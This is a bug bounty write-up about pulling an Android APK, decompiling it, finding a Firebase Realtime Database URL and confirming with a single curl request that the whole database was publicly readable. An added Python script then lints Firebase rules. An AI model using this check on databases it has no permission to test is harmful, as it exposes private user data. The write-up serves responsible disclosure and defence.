WRITE UP – PRIVATE BUG BOUNTY: Firebase database exposed by misconfiguration – $2,000 USD


Introduction:

Hi everyone, it’s been a while since my last post, but I’m back. I want to tell you a short story about a private bug bounty program and why you should always check the basic payloads, because you will be surprised how often they work.

If you like Bug Bounty writeups please check my handbook Bug Bounty Write Ups Collection


Report Summary:

Hi REDACTED team, I was able to find a misconfigured Firebase instance URL exposed in your REDACTED Android application.

Proof of concept:

1.- Get the latest REDACTED Android application. In my case I installed it on my phone (with the phone connected in debug mode) and then pulled the APK with adb (com.REDACTED.android.main is the APK package name):

omespino@h0st:~# adb pull data/app/com.REDACTED.android.main/base.apk

2.- Then I decompile the APK with apktool:

omespino@h0st:~# apktool d base.apk

3.- Then I just grep for firebase and HTTP strings in the “base/AndroidManifest.xml” file.

# grep for firebase and HTTP strings and got some URLs including the firebaseio.com one
omespino@h0st:~# grep -ir firebase | grep http 
- redacted - 
 ...
 ...
 "https://API-REDACTED-XXXXXXXXXXXX.firebaseio.com/"
 ...
 ...
- redacted -

4.- Simple POC to see the firebase misconfiguration (just append .json to the URL):

omespino@h0st:~# curl -X GET -H "REDACTED-Security: @omespino" https://API-REDACTED-XXXXXXXXXXXX.firebaseio.com/.json

5.- See the full Firebase database exposed, because it is misconfigured with bad permissions.

PS: I made the request and then stopped after confirming that it was vulnerable.


Environment and tools

adb Android Debug Bridge version 1.0.39
apktool 2.3.3

Impact

Since the full firebase database instance is misconfigured, anyone can pull the whole database.
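The two checks an app owner would want from this story are (a) knowing which Firebase Realtime Database URLs a build actually references (the step 3 grep above) and (b) never shipping rules that make the root readable by anyone. The script below is an added example, not code from the original write-up or from the program in question; the decompiled fragment, hostnames and rules documents it uses are constructed placeholders, and the rules format is Firebase's documented JSON (".read"/".write" per path).

```python
"""Added example (not from the original write-up): inventory the Firebase
Realtime Database URLs an Android build references, and lint the database
rules before deployment so a world-readable root never ships.
All sample inputs below are constructed for illustration."""
import json
import re
from typing import List, Tuple

# Matches the *.firebaseio.com URL form shown in the write-up.
FIREBASE_URL_RE = re.compile(r'https?://[A-Za-z0-9.\-]+\.firebaseio\.com/?')


def find_firebase_urls(text: str) -> List[str]:
    """Return the distinct firebaseio.com URLs found in decompiled app text,
    in first-seen order, with any trailing slash removed."""
    seen: List[str] = []
    for match in FIREBASE_URL_RE.findall(text):
        url = match.rstrip('/')
        if url not in seen:
            seen.append(url)
    return seen


def audit_rules(rules_json: str) -> List[Tuple[str, str]]:
    """Walk a Firebase Realtime Database rules document and return
    (path, finding) pairs for every .read/.write that is unconditionally
    true. An empty list means no blanket public access was found."""
    doc = json.loads(rules_json)
    findings: List[Tuple[str, str]] = []

    def walk(node, path: str) -> None:
        if not isinstance(node, dict):
            return
        for key, value in node.items():
            if key in ('.read', '.write'):
                # Both the JSON boolean and the string "true" grant everyone access.
                if value is True or (isinstance(value, str) and value.strip().lower() == 'true'):
                    findings.append((path or '/', f'{key} is unconditionally true'))
            elif not key.startswith('.'):
                # Child locations; dotted keys like .validate/.indexOn are not paths.
                walk(value, f'{path}/{key}')

    walk(doc.get('rules', {}), '')
    return findings


# Constructed sample: a fragment of decompiled output with placeholder hostnames.
SAMPLE_DECOMPILED = '''
<string name="firebase_database_url">https://api-placeholder-0000.firebaseio.com</string>
<string name="google_api_key">PLACEHOLDER-KEY</string>
const-string v0, "https://api-placeholder-0000.firebaseio.com/"
'''

# Constructed sample: the weak rules that let anyone read (and write) the whole database.
WEAK_RULES = '{"rules": {".read": true, ".write": true}}'

# Constructed sample: hardened rules, each signed-in user can only reach their own subtree.
HARDENED_RULES = '''{
  "rules": {
    ".read": false,
    ".write": false,
    "users": {
      "$uid": {
        ".read": "auth != null && auth.uid == $uid",
        ".write": "auth != null && auth.uid == $uid"
      }
    }
  }
}'''

if __name__ == '__main__':
    print('Firebase URLs referenced:', find_firebase_urls(SAMPLE_DECOMPILED))
    print('Weak rules findings:', audit_rules(WEAK_RULES))
    print('Hardened rules findings:', audit_rules(HARDENED_RULES))
```

Run `find_firebase_urls` over the whole apktool output directory of your own build to see every instance it talks to, and run `audit_rules` on your rules file in CI so a root-level `".read": true` fails the pipeline before it reaches production.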


Well, that’s it. Share your thoughts: what do you think about how they handled that security issue? If you have any doubts, comments or suggestions, just drop me a line here or on Twitter @omespino. Read you later.
